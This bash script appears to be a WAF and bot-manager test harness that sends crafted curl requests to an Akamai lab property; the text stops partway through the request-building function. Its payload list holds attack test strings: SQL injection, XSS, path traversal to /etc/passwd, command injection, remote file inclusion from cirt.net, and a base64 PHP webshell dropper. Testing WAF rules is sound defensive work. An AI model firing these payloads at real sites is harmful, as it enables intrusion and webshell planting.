origin33/app/flask/scripts/mychecker.sh


#! /bin/bash
# Print the ASCII-art "checker" banner, followed by one empty line.
function logo()
{
  # One printf call, one banner row per argument. The rows stay in double
  # quotes so the backslashes reach the terminal untouched.
  printf '%s\n' \
    " _ _ " \
    " | | | | " \
    " ___| |__ ___ ___| | _____ _ __ " \
    " / __| '_ \ / _ \/ __| |/ / _ \ '__|" \
    "| (__| | | | __/ (__| < __/ | " \
    " \___|_| |_|\___|\___|_|\_\___|_| v1.0" \
    ""
}
# Print the banner and the command-line usage summary.
# Note: this function shadows the bash builtin `help` inside the script.
function help()
{
  logo
  # Quoted delimiter: the text below is emitted literally, no expansion.
  cat <<'USAGE'
Welcome! This script aims to ease the testing of WAF Application Controls, Bot Manager Standard and Bot Manager Premier
Please check the information below in order to configure the proper parameters.

checker.sh -c [<file>] -r [<reference>] -v -e -d -m

-c Configuration file. Check default.conf inside 'conf' folder for more information or use the -m option

Optional:
-r Identifier added to the referer header to filter in WSA.
-v Verbose mode.
-e Export results to a CSV file.
-d Use DNS lookup instead of hard-coded Edge IPs (use with caution, resolvers could block your IP if too much tests).
-m Print manual.

USAGE
}
# Print the banner and the manual for the configuration-file format:
# the six fields of a line and the accepted values for each of them.
function helpconf()
{
  logo
  # One manual row per printf argument; rows are literal (single-quoted).
  printf '%s\n' \
    'This script reads a configuration file that uses the following 6 block of data per line:' \
    '' \
    '[type] [environment] [method] [URL] [path] [arguments(optional)]' \
    '' \
    'Examples:' \
    'atg p GET http://www.{akamaized domain}.com / krs-cmd' \
    'bms s GET http://www.{akamaized domain}.com / aka-arb' \
    'bmp p POST http://www.{akamaized domain}.com / foo=bar' \
    'man s GET http://www.{akamaized domain}.com /?foo=bar' \
    'man p POST http://www.{akamaized domain}.com / foo=bar' \
    '' \
    'Available options:' \
    '--------------------------------------------------------------------------------------' \
    'type The type of control that will be tested, options are:' \
    ' atg -- WAF Attack Groups' \
    ' bms -- Bot Manager Standard' \
    ' bmp -- Bot Manager Premier' \
    ' man -- Manual test' \
    'environment Destination of the request to be generated, options are:' \
    ' s -- Staging environment' \
    ' p -- Production environment' \
    'method Method expected on Akamai for the tested URL, options are: GET or POST' \
    'url URL to test, the protocol (http or https) needs to be used' \
    'path Path to test (use / if no specific path)' \
    'arguments For atg:' \
    ' krs-cmd -- Command Injection' \
    ' krs-xss -- Cross-Site Scripting' \
    ' krs-dos -- DDOS' \
    ' krs-iht -- Invalid HTTP' \
    ' krs-php -- PHP Injection' \
    ' krs-rfi -- Remote File Inclusion' \
    ' krs-sql -- SQL Injection' \
    ' krs-trj -- Trojan' \
    ' aag-wat -- Web Attack Tool' \
    ' aag-wpr -- Web Protocol Attack' \
    ' aag-sql -- SQL Injection' \
    ' aag-xss -- Cross-Site Scripting' \
    ' aag-lfi -- Local File Inclusion' \
    ' aag-rfi -- Remote File Inclusion' \
    ' aag-cmi -- Command Injection' \
    ' aag-wpl -- Web Platform Attack' \
    ' penalty -- Penalty test (no attack)' \
    ' For bms:' \
    ' aka-arb -- Academic or Research Bots' \
    ' aka-asc -- Automated Shopping Cart and Sniper Bots' \
    ' aka-bib -- Business Intelligence Bots' \
    ' aka-eco -- E-Commerce Search Engine Bots' \
    ' aka-eag -- Enterprise Data Aggregator Bots' \
    ' aka-fia -- Financial Account Aggregator Bots' \
    ' aka-fis -- Financial Services Bots' \
    ' aka-job -- Job Search Engine Bots' \
    ' aka-mda -- Media or Entertainment Search Bots' \
    ' aka-new -- News Aggregator Bots' \
    ' aka-onl -- Online Advertising Bots' \
    ' aka-rss -- RSS Feed Reader Bots' \
    ' aka-seo -- SEO, Analytics or Marketing Bots' \
    ' aka-sit -- Site Monitoring and Web Development Bots' \
    ' aka-soc -- Social Media or Blog Bots' \
    ' aka-war -- Web Archiver Bots' \
    ' aka-wse -- Web Search Engine Bots' \
    ' tra-ikb -- Impersonators of Known Bots' \
    ' tra-dvf -- Development Frameworks' \
    ' tra-htl -- HTTP Libraries' \
    ' tra-wsl -- Web Services Libraries' \
    ' tra-osc -- Open Source Crawlers/Scraping Platforms' \
    ' tra-hbt -- Headless Browsers/Automation Tools' \
    ' tra-dcb -- Declared Bots (Keyword Match)' \
    ' tra-agc -- Aggressive Web Crawlers' \
    ' tra-req -- Request Anomaly' \
    ' act-cok -- Cookie Integrity Failed' \
    ' For bmp:' \
    ' List of body parameters used by the endpoint (if any)' \
    ' For man:' \
    ' If using POST, list of body parameters'
}
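#######################################
# Walk the test plan in $filecnf and issue one request per line via resolve().
# A plan line holds up to six space-separated fields:
#   [type] [environment] [method] [URL] [path] [arguments]
# Lines that are empty or start with '#' are skipped.
# Globals:
#   filecnf, property, verbose            (read)
#   line, test_string, host, protocol,
#   env, sleepsec                         (written; read by resolve/curl)
# Arguments:
#   none - positional arguments supplied by the caller are not used
# Outputs:
#   progress lines on stdout when verbose=1
# Exits:
#   the whole script, when a line has no usable protocol or environment
#######################################
function readconfig
{
  local skip_re='^(#.*|^$)$'
  if [[ $verbose -eq 1 ]]; then echo -e "> reading configuration"; fi
  # The "|| [ -n ... ]" part keeps a last line that lacks a trailing newline.
  while IFS=' ' read -ra line || [ -n "${line[0]}" ]; do
    [[ "${line[0]}" =~ $skip_re ]] && continue
    test_string=("${line[@]}")
    if [[ $verbose -eq 1 ]]; then echo -e "> ${test_string[0]} ${test_string[1]} ${test_string[2]} ${test_string[3]} ${test_string[4]} ${test_string[5]}"; fi
    # NOTE(review): the URL field of the plan line is discarded here; every
    # request targets http://<property>.akamai-lab.com, so the https branch
    # below cannot be reached from this assignment.
    test_string[3]="http://${property}.akamai-lab.com"
    # echo $test_string[3]
    protocol=""
    sleepsec=5
    # Start each line with an empty host so a value left over from the
    # previous line can never satisfy the protocol check below.
    host=""
    if [[ ${test_string[3]} =~ ^http:// ]]; then
      host=${test_string[3]:7}
      protocol=${test_string[3]:0:4}
    fi
    if [[ ${test_string[3]} =~ ^https:// ]]; then
      host=${test_string[3]:8}
      protocol=${test_string[3]:0:5}
    fi
    if [[ $host == '' ]]; then
      echo "Oops... did't find any valid protocol."
      exit
    fi
    env=""
    # resolve() selector: 1/2 = production http/https, 3/4 = staging http/https.
    if [[ ${test_string[1]} == 'p' ]]; then
      env="Production"
      if [[ $protocol == 'http' ]]; then resolve 1; fi
      if [[ $protocol == 'https' ]]; then resolve 2; fi
    elif [[ ${test_string[1]} == 's' ]]; then
      env="Staging"
      if [[ $protocol == 'http' ]]; then resolve 3; fi
      if [[ $protocol == 'https' ]]; then resolve 4; fi
    else
      echo "Oops... not a valid environment."
      exit
    fi
    test_string=()
    # resolve() may lower sleepsec to 0, so report the pause actually taken
    # instead of a fixed "5".
    if [[ $verbose -eq 1 ]]; then echo -e "> sleeping for ${sleepsec} seconds..."; fi
    sleep "$sleepsec"
  done < "$filecnf"
}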
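#######################################
# Choose the edge address for one request and pass it to curl().
# Selector $1 maps to a set of globals:
#   1 -> PFIP / PFFQ / PFIPi    2 -> PEIP / PEFQ / PEIPi
#   3 -> SFIP / SFFQ / SFIPi    4 -> SEIP / SEFQ / SEIPi
# With an empty pool (-d option) the address comes from a DNS lookup of the
# matching FQDN. Otherwise a random pool entry is used, except for aag-* and
# penalty tests, which keep the previously chosen address and skip the pause
# between requests (sleepsec=0).
# Globals:
#   the pool/FQDN variables above, test_string, verbose   (read)
#   the matching *IPi variable, xpass, sleepsec           (written)
# Arguments:
#   $1 - selector 1..4; any other value does nothing
# Returns:
#   status of curl(), or 1 when the DNS answer is not a usable address
#######################################
function resolve()
{
  local pool_var fqdn_var cache_var
  xpass=0
  case $1 in
    1) pool_var=PFIP; fqdn_var=PFFQ; cache_var=PFIPi ;;
    2) pool_var=PEIP; fqdn_var=PEFQ; cache_var=PEIPi ;;
    3) pool_var=SFIP; fqdn_var=SFFQ; cache_var=SFIPi ;;
    4) pool_var=SEIP; fqdn_var=SEFQ; cache_var=SEIPi ;;
    *) return 0 ;;
  esac

  local pool=${!pool_var}
  local fqdn=${!fqdn_var}
  local edge=${!cache_var}
  local token_re='^[0-9A-Za-z:._-]+$'
  local -a raw_ips=() pool_ips=()
  local ip

  if [[ -z $pool ]]; then
    # Run the lookup directly; no eval of a command string is needed.
    edge=$(dig +short "$fqdn" | tail -n1)
    # dig can print diagnostics on stdout when no server answers. Only a
    # single address/hostname token may go on to curl's --connect-to.
    if [[ -n $edge && ! $edge =~ $token_re ]]; then
      printf 'resolve: unexpected DNS answer for %s, request skipped\n' "$fqdn" >&2
      printf -v "$cache_var" '%s' ''
      return 1
    fi
    if [[ $verbose -eq 1 ]]; then echo -e "> DNS lookup performed [$edge]"; fi
  else
    if ! [[ ${test_string[5]} =~ ^aag- || ${test_string[5]} = 'penalty' ]]; then
      xpass=1
    else
      # Keep the address already in use; pick one only if none is cached yet.
      if [[ $edge == '' ]]; then xpass=1; else xpass=0; fi
      sleepsec=0
    fi
    if [[ $xpass == 1 ]]; then
      # Split on ':' without the globbing an unquoted expansion would allow,
      # and drop empty entries.
      IFS=': ' read -ra raw_ips <<< "$pool"
      for ip in "${raw_ips[@]}"; do
        if [[ -n $ip ]]; then pool_ips+=("$ip"); fi
      done
      if (( ${#pool_ips[@]} > 0 )); then
        edge=${pool_ips[RANDOM % ${#pool_ips[@]}]}
      else
        edge=""
      fi
    fi
    if [[ $verbose -eq 1 ]]; then echo -e "> Cache used [$edge]"; fi
  fi

  # Store the choice in the selector's global so the next call can reuse it.
  printf -v "$cache_var" '%s' "$edge"
  curl "$edge"
}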
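# Emit one CSV cell: values holding a comma, a double quote or a line break
# are wrapped in double quotes with embedded quotes doubled; anything else is
# written unchanged.
function _csv_field()
{
  local value=$1
  local dq='"'
  case $value in
    *"$dq"* | *,* | *$'\n'* | *$'\r'*)
      value=${value//$dq/$dq$dq}
      printf '"%s"' "$value"
      ;;
    *)
      printf '%s' "$value"
      ;;
  esac
}

#######################################
# Append the result of the current test as one row of the CSV report.
# Globals:
#   verbose, test_string, ACRONYMA, ACRONYMB, env, http, epoch, refe, URL,
#   filecnf, filetim                  (read)
#   export_payload, export_type      (written)
# Outputs:
#   appends to "<basename of filecnf>_<filetim>.csv" in the current directory
#######################################
function exportcsv()
{
  local idx cell out_file
  local -a cells=()
  if [[ $verbose -eq 1 ]]; then echo -e "> exporting .csv"; fi
  export_payload=""
  export_type=""
  # ACRONYMA holds the short codes, ACRONYMB the label at the same index.
  for idx in "${!ACRONYMA[@]}"; do
    if [[ ${test_string[5]} == "${ACRONYMA[$idx]}" ]]; then export_payload=${ACRONYMB[$idx]}; fi
    if [[ ${test_string[0]} == "${ACRONYMA[$idx]}" ]]; then export_type=${ACRONYMB[$idx]}; fi
  done
  if [[ ${test_string[0]} == 'bmp' ]]; then export_payload=${test_string[5]}; fi

  # The URL, a bmp body taken from the plan file and curl's error text can all
  # contain commas or quotes; written raw they shift the columns of the row.
  # NOTE(review): cells are not neutralised for a leading =, +, - or @, so
  # treat the report as data if it is opened in a spreadsheet.
  for cell in "$env" "$http" "$epoch" "$refe" "$export_type" "$export_payload" "$URL"; do
    cells+=("$(_csv_field "$cell")")
  done

  # Quoted so a plan path containing spaces still gives one file name.
  out_file="$(basename -- "$filecnf")_${filetim}.csv"
  local IFS=','
  printf '%s\n' "${cells[*]}" >> "$out_file"
}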
#######################################
# Fill the request placeholders with the test string of every rule id given.
# Each id selects one arm below; an arm either appends to a placeholder (+=)
# or replaces it (=), so the order of the ids in $1 matters.
# Globals written:
#   rules, PARAMHOLDER, HEADERHOLDER1..3, DATAHOLDER, COOKIEHOLDER, UAHOLDER,
#   PROTOCOLHOLDER, H6, H9, H10
# Globals read:
#   test_string (arm 950119)
# Arguments:
#   $1 - colon-separated list of rule ids; may be empty
#######################################
function payload
{
  local rule_id
  # Defaults before any rule is applied.
  PARAMHOLDER="?id=1"
  HEADERHOLDER1=""
  HEADERHOLDER2=""
  HEADERHOLDER3=""
  rules=(${1//:/ })
  for rule_id in "${rules[@]}"; do
    case "$rule_id" in
      950002) PARAMHOLDER+="&p=powershell.exe" ;;
      950006) PARAMHOLDER+="&p=chmod.40%2B1x.traceroute" ;;
      950011) PARAMHOLDER+="&p=%3C%21--%23printenv" ;;
      950103) HEADERHOLDER1+="p: ..%2F..%2F..%2F..%2F" ;;
      950907) PARAMHOLDER+="&p=wget" ;;
      3000005) PARAMHOLDER+="&p=%2Fsbin%2Fping" ;;
      3000007) PARAMHOLDER+="&p=%3B+head+%2Fusr%2Ftemp+%3E+my.f" ;;
      3000012) PARAMHOLDER+="&p=action%3Anew+java." ;;
      3000013) PARAMHOLDER+="&p=wget+https%3A%2F%2Fmy.site" ;;
      3000014) PARAMHOLDER+="&p=%24%7B.openstream()." ;;
      3000020) PARAMHOLDER+="&p=%2Fproc%2Fself%2Fenviron" ;;
      3000023) PARAMHOLDER+="&class%5B%27classLoader%27%5D%5B%27resources%27%5D%5B%27dirContext%27%5D%5B%27docBase%27%5D%3D%2F%2F192.168.18.1%2Ffile.do" ;;
      3000025) PARAMHOLDER+="&p=()%20%7B.4654" ;;
      3000031) HEADERHOLDER2+="Range: 18446744073709551615" ;;
      3000033) PARAMHOLDER+="&p=phar%3A%2F%2F%20zlib%3A%2F%2F%20glob%3A%2F%2F%20expect%3A%2F%2F%20jar%3A%2F%2F" ;;
      3000034) PARAMHOLDER+="&p=Runtime.getRuntime(" ;;
      3000041) PARAMHOLDER+="&p=%24class.inspect(%20type.getruntime(freemarker.template.utility.execute" ;;
      3000056) PARAMHOLDER+="&p=o%3A5%3A%5C%22456%5C%22%3A546%3A%7Ba%3B%7D" ;;
      3000058) PARAMHOLDER+="&p=action%3A%24%7B" ;;
      3000065)
        H10="Content-Type: text/xml"
        DATAHOLDER='<command>%3Ccommand%3Ejava.lang.processbuilder$nullinputstream\ncom.sun.xml.internal.ws.encoding.xml.xmlmessage$xmldatasource\njavax.crypto.cipherinputstream\njavax.crypto.nullcipher\n<classfactory>\njava.lang.processbuilder%24nullinputstream%5Cn%0Dcom.sun.xml.internal.ws.encoding.xml.xmlmessage%24xmldatasource%5Cn%0Djavax.crypto.cipherinputstream%5Cn%0Djavax.crypto.nullcipher%5Cn%0D%3Cclassfactory%3E'
        ;;
      3000068) PARAMHOLDER+="&p=%3Cesi%3Ainclude" ;;
      3000072)
        H10="Content-Type: application/octet-stream"
        DATAHOLDER='*.exec(* *burpcollaborator* *ysoserial* *freddy?*http:*.20java.%2Fio%2Ffile%20java%2Flang%2Fruntime.123'
        ;;
      950018) PARAMHOLDER+="&p=http%3A%2F%2Fwww.test.com%2Ftest.pdf%20x0d%23" ;;
      958000) PARAMHOLDER+="&p=.addimport" ;;
      958001) PARAMHOLDER+="&p=document.exitFullscreen%5D" ;;
      958002) PARAMHOLDER+="&p=.execscript" ;;
      958003) PARAMHOLDER+="&p=.fromcharcode" ;;
      958004) PARAMHOLDER+="&p=.innerhtml" ;;
      958005) PARAMHOLDER+="&p=%3C!%5Bcdata%5B" ;;
      958006) PARAMHOLDER+="&p=%3Cbody%20background" ;;
      958007) PARAMHOLDER+="&p=%3Cbody%20onload" ;;
      958008) PARAMHOLDER+="&p=%3Cinput%20type%20image" ;;
      958009) PARAMHOLDER+="&p=%40import" ;;
      958010) PARAMHOLDER+="&p=activexobject" ;;
      958011) PARAMHOLDER+="&p=background-image%3A" ;;
      958012) PARAMHOLDER+="&p=copyparentfolder" ;;
      958013) PARAMHOLDER+="&p=createtextrange" ;;
      958016) PARAMHOLDER+="&p=getparentfolder" ;;
      958017) PARAMHOLDER+="&p=getspecialfolder" ;;
      958018) PARAMHOLDER+="&p=href%20javascript%3A" ;;
      958019) PARAMHOLDER+="&p=href%20shell%3A" ;;
      958020) PARAMHOLDER+="&p=href%20vbscript%3A" ;;
      958022) PARAMHOLDER+="&p=livescript%3A" ;;
      958023) PARAMHOLDER+="&p=lowsrc%20javascript%3A" ;;
      958024) PARAMHOLDER+="&p=lowsrc%20shell%3A" ;;
      958025) PARAMHOLDER+="&p=lowsrc%20vbscript%3A" ;;
      958026) PARAMHOLDER+="&p=mocha%3A" ;;
      958027) PARAMHOLDER+="&p=onabort" ;;
      958028) PARAMHOLDER+="&p=settimeout%20(" ;;
      958030) PARAMHOLDER+="&p=src%20http%3A" ;;
      958031) PARAMHOLDER+="&p=src%20javascript%3A" ;;
      958032) PARAMHOLDER+="&p=src%20shell%3A" ;;
      958033) PARAMHOLDER+="&p=src%20vbscript%3A" ;;
      958034) PARAMHOLDER+="&p=style%3Dbexpression(" ;;
      958036) PARAMHOLDER+="&p=type%20application%20x-javascript" ;;
      958037) PARAMHOLDER+="&p=type%20application%20x-vbscript" ;;
      958038) PARAMHOLDER+="&p=type%20text%20ecmascript" ;;
      958039) PARAMHOLDER+="&p=type%20text%20javascript" ;;
      958040) PARAMHOLDER+="&p=type%20text%20jscript" ;;
      958041) PARAMHOLDER+="&p=type%20text%20vbscript" ;;
      958045) PARAMHOLDER+="&p=url%20javascript%3A" ;;
      958046) PARAMHOLDER+="&p=url%20shell%3A" ;;
      958047) PARAMHOLDER+="&p=url%20vbscript%3A" ;;
      3000036) PARAMHOLDER+="&foo&msg=bar" ;;
      950116) PARAMHOLDER="%ufF12/" ;;
      950107) PARAMHOLDER="%00%!%u1234/?id=1" ;;
      950108)
        H10="Content-Type: application/x-www-form-urlencoded;charset=test"
        DATAHOLDER='%00%!%u1234/'
        ;;
      950109) PARAMHOLDER+="&p=%2500%25!%25u1234" ;;
      958230) HEADERHOLDER1="Range: 50-10 bytes=10-,10-,10-,10-,10-," ;;
      958231) HEADERHOLDER1="Range: bytes=10-,10-,10-,10-,10-," ;;
      958291) HEADERHOLDER1="Range: bytes=0-" ;;
      958295) HEADERHOLDER1="Connection: keep-alive,close" ;;
      960006) H9="User-Agent;" ;;
      960007) H6="Host;" ;;
      960008) H6="Host:" ;;
      960009) H9="User-Agent:" ;;
      960010) HEADERHOLDER1="Content-Type: application/x-www-checker" ;;
      960011) HEADERHOLDER2="Content-Length: 1000" ;;
      960012) HEADERHOLDER2="Content-Length:" ;;
      960016) HEADERHOLDER2="Content-Length: checker" ;;
      960022)
        HEADERHOLDER1="Expect: 100-continue"
        PROTOCOLHOLDER="--http1.0"
        ;;
      960034) PROTOCOLHOLDER="--httpX.X" ;;
      960038) HEADERHOLDER1="Content-Range: test" ;;
      960901) PARAMHOLDER+="&one=more" ;;
      960902) HEADERHOLDER3="Content-Encoding: Identity" ;;
      # NOTE(review): inside double quotes the shell expands $_GET (normally
      # to nothing), so the value stored differs from the text written here.
      958976) PARAMHOLDER+="&current={pboot:if(eval\($_GET\['a'\]))}1{/pboot:if}&a=fputs(fopen(base64_decode('eC5waHA'),'w'),%20base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWyd4YiddKTsgPz54YnNoZWxs'));" ;;
      958977) PARAMHOLDER+="&p=allow_url_include%3D%20safe_mode%3D%20suhosin.simulation%3D%20disable_functions%3D%20open_basedir%3D%20auto_prepend_file%3D%20php%3A%2F%2Finput" ;;
      959151) PARAMHOLDER+="&p=%3C%3F%3C%3F" ;;
      3000003) PARAMHOLDER+="&p=base64_decode(" ;;
      3000016) PARAMHOLDER+="&p=data%3Atext%2Fplain%3Bbase64%2C" ;;
      950117) PARAMHOLDER+="&p=https%3A%2F%2F123.123.123.123" ;;
      950118) PARAMHOLDER+="&p=mosConfig_absolute_path=GALLERY_BASEDIR%3Dhttps%3A%2F%2F%5B%5E%5Cs%5D%2B" ;;
      950119) PARAMHOLDER+="&p=https%3A%2F%2F${test_string[3]}%3F" ;;
      950120) PARAMHOLDER+="&referer=GALLERY_BASEDIR%3Dhttps%3A%2F%2F%5B%5E%5Cs%5D%2B" ;;
      950001) PARAMHOLDER+="&p=dbms_java" ;;
      950007) PARAMHOLDER+="&p=attnotnull" ;;
      950901) PARAMHOLDER+="&p=%22test%3C%3D%3E%22test" ;;
      950908) PARAMHOLDER+="&p=coalesce" ;;
      959070) PARAMHOLDER+="&p=create%20table%27%20statements%20(e.g.%20%27create%20table%20(" ;;
      959071) PARAMHOLDER+="&p=%27%20OR%20%27string%27%20%3C" ;;
      959072) PARAMHOLDER+="&p=AND%20%27string%27%3D" ;;
      959073) PARAMHOLDER+="&p=select%27...%27length%27...%27from%27%2C%20%27select%27...%27count%27...%27from%27%2C%20%27sp_sqlexec%27%2C%20%27group%27...%27by%27...%27having" ;;
      981172) COOKIEHOLDER="p=%27...%27length%27...%27from%27%2C%20%27select%27...%27count%27...%27from%27%2C%20%27sp_sqlexec%27%2C%20%27group%27...%27" ;;
      950110) HEADERHOLDER1="x_file: test" ;;
      950921) PARAMHOLDER="/scri%E2%80%8Cpts/root.exe&/c+dir" ;;
      watatomic)
        PARAMHOLDER="/bbscan-404-existence-check?id=1&msg=legion"
        UAHOLDER+=" absinthe"
        HEADERHOLDER1="acunetix-aspect: 1"
        HEADERHOLDER2="nstealth_xss: nstealth_xss"
        ;;
      wpratomic)
        HEADERHOLDER1="Content-Type: application/xml"
        HEADERHOLDER2=" Transfer-Encoding: checker"
        HEADERHOLDER3="Content-Length: chunked"
        ;;
      sqlatomic) PARAMHOLDER+="&fakeparam=-1%20UNION%20ALL%20SELECT%20%40%40version%2C2%2C3--" ;;
      xssatomic) PARAMHOLDER+="&fakeparam=%3Cscript%3Ewindow.alert(%221213%22)%3C%2Fscript%3E&f2=PHNjcmlwdD5hbGVyd" ;;
      lfiatomic) PARAMHOLDER+="&fakeparam=.././.././../etc/passwd" ;;
      rfiatomic) PARAMHOLDER+="&fakeparam=http://cirt.net/rfiinc.txt" ;;
      cmiatomic) PARAMHOLDER+="&fakeparam=something;/bin/whoami" ;;
      wplatomic) HEADERHOLDER1+="Range: 18446744073709551615" ;;
      # Unknown id: the query string is cleared.
      *) PARAMHOLDER="" ;;
    esac
  done
}
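#######################################
# Build one test request, send it with /usr/bin/curl and print the outcome.
# The function shadows the curl binary by name; the binary itself is always
# called through its full path.
# Globals read:
#   test_string, host, env, verbose, fileref, filetim
# Globals written:
#   method, epoch, now (exported), description, URL, CURL, CURLARGS, http,
#   refe, stopv, H1..H10, HEADERHOLDER1..3, PARAMHOLDER, PATHHOLDER,
#   DATAHOLDER, UAHOLDER, COOKIEHOLDER, PROTOCOLHOLDER, regexhtc, regexref,
#   regexdie, test_string[5] (bmp and man types)
# Arguments:
#   $1 - edge address the connection is pinned to through --connect-to
# Outputs:
#   summary line, target URL and HTTP status (or curl error text) on stdout;
#   the full transcript as well when verbose=1
# Exits:
#   the whole script on an unknown method or test argument
#######################################
function curl
{
  local send_body=0
  local header shown resp_file liner
  local -a headers=() curl_argv=()
  local pragma="Pragma: akamai-x-cache-on, akamai-x-cache-remote-on, akamai-x-check-cacheable, akamai-x-get-cache-key, akamai-x-get-extracted-values, akamai-x-get-nonces, akamai-x-get-ssl-client-session-id, akamai-x-get-true-cache-key, akamai-x-serial-no, akamai-x-get-request-id, akamai-x-request-trace, akamai-x--meta-trace, akama-xi-get-extracted-values"

  # NOTE(review): never switched off again, so after the first request every
  # [[ ]] comparison and case statement in the script matches case-insensitively.
  shopt -s nocasematch
  if ! [[ ${test_string[2]} =~ ^(GET|POST)?$ ]]; then
    echo -e 'Oops... wrong method!'
    exit
  fi

  if [[ $verbose -eq 1 ]]; then echo -e "> using ${test_string[2]}"; fi
  if ! [[ ${test_string[2]} =~ ^(GET)?$ ]]; then method="-X ${test_string[2]}"; else method=""; fi
  # The body is sent whenever the method field is POST (or empty).
  if [[ ${test_string[2]} =~ ^(POST)?$ ]]; then send_body=1; fi

  # Per-request defaults; payload() and the type branches below adjust them.
  COOKIEHOLDER=""
  HEADERHOLDER1="Connection: keep-alive"
  HEADERHOLDER2=""
  PARAMHOLDER=""
  PATHHOLDER=""
  DATAHOLDER="{'foo':'bar'}"
  UAHOLDER=""
  PROTOCOLHOLDER="--http2"
  # The Referer carries either the -r identifier or the current epoch so the
  # request can be found again in the reporting tool.
  if [ -z "$fileref" ]; then
    epoch=$(date +%s)
  else
    epoch=$fileref
  fi
  H1="Accept: application/json"
  H2="Accept-Encoding: gzip;q=1.0, compress;q=0.5"
  H3="Accept-Language: en-US,en;q=1.0"
  H4="Cache-Control: no-cache"
  H5="Cookie: foo=bar;"
  H6="Host: $host"
  H7="Origin: ${test_string[3]}"
  H8="Referer: $epoch"
  H9="User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36 opr/checker"
  H10="Content-Type: text/plain"

  # The type field is compared with [ ] on purpose: unlike [[ ]] and case it
  # stays case-sensitive under nocasematch. Quoted so an empty field is a
  # plain mismatch instead of a test syntax error.
  if [ "${test_string[0]}" = 'atg' ]; then
    if [[ $verbose -eq 1 ]]; then echo -e "> Attack Group (atg) found"; fi
    case ${test_string[5]} in
      "krs-cmd") payload "950002:950006:950011:950103:950907:3000005" ;;
      "krs-xss") payload "950018:958000:958001:958002:958003:958004:958005:958006:958007:958008:958009:958010:958011:958012:958013:958016:958017:958018:958019:958020:958022:958023:958024:958025:958026:958027:958028:958030:958031:958032:958033:958034:958036:958037:958038:958039:958040:958041:958045:958046:958047" ;;
      "krs-dos") payload "3000036" ;;
      "krs-iht") payload "950107:950108:950109:958291:958295:960010:960016:960022:960038:960901:960902" ;;
      "krs-php") payload "958976:958977:959151:3000003:3000016" ;;
      "krs-rfi") payload "950117:950118:950119:950120" ;;
      "krs-sql") payload "950001:950007:950901:950908:959070:959071:959072:959073:981172" ;;
      "krs-trj") payload "950110:950921" ;;
      "aag-wat") payload "watatomic" ;;
      "aag-wpr") payload "wpratomic" ;;
      "aag-sql") payload "sqlatomic" ;;
      "aag-xss") payload "xssatomic" ;;
      "aag-lfi") payload "lfiatomic" ;;
      "aag-rfi") payload "rfiatomic" ;;
      "aag-cmi") payload "cmiatomic" ;;
      "aag-wpl") payload "wplatomic" ;;
      "penalty") payload "" ;;
      *) echo -e 'Oops... invalid argument!'; exit ;;
    esac
  elif [ "${test_string[0]}" = 'bms' ]; then
    if [[ $verbose -eq 1 ]]; then echo -e "> Bot Manager Standard (bms) found"; fi
    case ${test_string[5]} in
      "aka-arb") UAHOLDER+=" lightspeedsystems" ;;
      # NOTE(review): += appends to "Connection: keep-alive" and yields a
      # single fused header, while aka-eco assigns with =; confirm intent.
      "aka-asc") HEADERHOLDER1+="X-HONEY-BOT:Hi_HC_Aegah4luquud8ahVOchood5a" ;;
      "aka-bib") UAHOLDER+=" companybooknetworking.com" ;;
      "aka-eco") HEADERHOLDER1="X-HONEY-BOT:Hi_PC_uNeini4aphaiB1oiChoh1thi" ;;
      "aka-eag") UAHOLDER+=" shrinktheweb.com" ;;
      "aka-fia") UAHOLDER+=" (moneyforward)"; HEADERHOLDER1="X-MF-Tag:12345678" ;;
      "aka-fis") UAHOLDER+=" drwholdings.com" ;;
      "aka-job") UAHOLDER+=" motorelavoro.it" ;;
      "aka-mda") UAHOLDER+=" localconditions.com" ;;
      "aka-new") UAHOLDER+=" reader.aol.com" ;;
      "aka-onl") UAHOLDER+=" integralads.com" ;;
      "aka-rss") UAHOLDER+=" pocketcasts.com" ;;
      "aka-seo") UAHOLDER+=" terrykyleseoagency.com" ;;
      "aka-sit") HEADERHOLDER1="X-Abuse-Info: New Relic Synthetics Monitor" ;;
      "aka-soc") UAHOLDER+=" socialrank.io" ;;
      "aka-war") UAHOLDER+=" europarchive.org" ;;
      "aka-wse") UAHOLDER+=" femtosearch.com" ;;
      "tra-ikb") UAHOLDER+=" amazon route 53" ;;
      "tra-dvf") UAHOLDER+=" ruby microsoft atl native" ;;
      "tra-htl") UAHOLDER+=" winhttprequest" ;;
      "tra-wsl") UAHOLDER+=" httpful" ;;
      "tra-osc") UAHOLDER+=" mercury.postlight.com" ;;
      "tra-hbt") UAHOLDER+=" prerender" ;;
      "tra-dcb") UAHOLDER+=" semantic" ;;
      "tra-agc") UAHOLDER+=" openhose.org" ;;
      "tra-req") HEADERHOLDER1="Accept-Language: en"; UAHOLDER+=" mozilla./" ;;
      "act-cok") COOKIEHOLDER="ak_bmsc=foobar; bm_mi=foobar" ;;
      *) echo -e 'Oops... invalid argument!'; exit ;;
    esac
  elif [ "${test_string[0]}" = 'bmp' ]; then
    if [[ $verbose -eq 1 ]]; then echo -e "> Bot Manager Premier (bmp) found"; fi
    if [[ ${test_string[5]} != '' ]]; then
      DATAHOLDER="${test_string[5]}"
    fi
    test_string[5]="BMP"
  elif [ "${test_string[0]}" = 'man' ]; then
    if [[ $verbose -eq 1 ]]; then echo -e "> Manual test found"; fi
    if [[ $send_body -eq 1 ]]; then DATAHOLDER=${test_string[5]}; fi
    test_string[5]="Manual"
  else
    if [[ $verbose -eq 1 ]]; then echo -e "> No type found"; fi
  fi

  # Label for the summary line; only these six codes have one.
  description=""
  if [ "${test_string[5]}" = 'aka-arb' ]; then
    description="Academic or Research Bots"
  elif [ "${test_string[5]}" = 'aka-seo' ]; then
    description="SEO, Analytics or Marketing Bots"
  elif [ "${test_string[5]}" = 'aka-eco' ]; then
    description='E-Commerce Search Engine Bots'
  elif [ "${test_string[5]}" = 'tra-ikb' ]; then
    description='Impersonators of Known Bots'
  elif [ "${test_string[5]}" = 'tra-hbt' ]; then
    description='Headless Browsers/Automation Tools'
  elif [ "${test_string[5]}" = 'act-cok' ]; then
    description='Cookie Integrity Failed'
  else
    description='not equal'
  fi
  now=$(date)
  export now
  echo -e "\t $now : [ $env ] [ $description ]"

  H9+=${UAHOLDER}
  H5+=${COOKIEHOLDER}
  URL="${test_string[3]}${test_string[4]}${PARAMHOLDER}"
  CURL='/usr/bin/curl'
  # CURLARGS is kept for the verbose message only. The real argument list is
  # an array, so a value with spaces or glob characters in $1 or the method
  # cannot split into extra curl options.
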